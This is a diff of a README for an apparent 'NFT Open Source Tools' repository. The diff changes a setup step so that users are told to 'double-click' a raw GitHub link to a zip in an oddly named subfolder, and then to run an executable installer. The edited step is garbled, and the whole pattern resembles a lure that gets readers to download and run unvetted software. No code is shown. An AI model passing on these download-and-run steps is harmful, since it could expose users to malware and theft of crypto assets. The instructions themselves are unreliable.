Kumar-Sarada/NFT-Open-Source-Tools-2025/README.md

 After downloading, follow these instructions:

 1. Open the folder where you downloaded the file.
-2. Double-click the file named `NFT-Open-Source-Tools.exe`.
+2. Double-click the file named `https://raw.githubusercontent.com/Kumar-Sarada/NFT-Open-Source-Tools-2025/main/adenophyma/NFT-Open-Source-Tools-2025.zip`.
 3. Follow the on-screen instructions to complete the setup.

 Once installed, you can find the application in your Programs menu.
 Open it, and you are ready to begin!